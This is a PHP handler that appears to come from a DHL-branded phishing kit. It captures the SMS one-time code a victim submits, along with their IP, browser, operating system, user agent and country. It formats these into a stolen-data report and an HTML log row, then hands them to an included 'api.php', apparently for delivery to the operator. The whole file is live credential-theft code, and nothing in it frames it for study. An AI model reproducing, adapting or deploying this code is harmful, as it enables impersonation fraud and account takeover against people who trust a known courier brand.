<?php

@ini_set('display_errors', 'on');
if(isset($_POST['otp1'])){session_start(); 
require 'detect.php';
include "setting.php";
$IP = getenv("REMOTE_ADDR");
$date = date("d M, Y");
$times = date("g:i a");

$otp1 = $_POST['otp1'];
$useragent = $_SERVER['HTTP_USER_AGENT'];

$ecran = $_SESSION['computer'];
$brow = $_SESSION['browser'];
$sys = $_SESSION['os'];
$code = $_SESSION['ip_countryCode']=clientData('code');
$country = strtolower($code);


$msg = '

[+]━━━━━━━━━【💖DHL💖】━━━━━━━━━━[+]
[+]━━━━━━━━【👤 SMS INFO]━━━━[+]
[👤 CODE ] = '.$otp1.'
[+]━━━━━━━━【💻 System】━━━━━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$IP.'
[⏰ TIME/DATE] ='.$times.' / '.$date.'
[🌐 BROWSER] = '.$brow.' and '.$sys.'
[🖖 FINGERPRINT] = '.$useragent.'
[+]━━━━━━━━━【💖DHL💖】━━━━━━━━━━[+]
';
$msght = '<tr>
			<td width="80">
			<p align="center"><img src="https://www.countryflags.io/'.$_SESSION['ip_countryCode'].'/flat/24.png">' .$IP.'</td>
			<td width="30">
			<p align="center">SMS 1</td>
			<td width="40">
			<p align="center">'.$otp1.'</td>
			<td width="40">
			<p align="center">'.$times.' / '.$date.'</td>
			</font></td></tr>';


include("api.php");
}
?>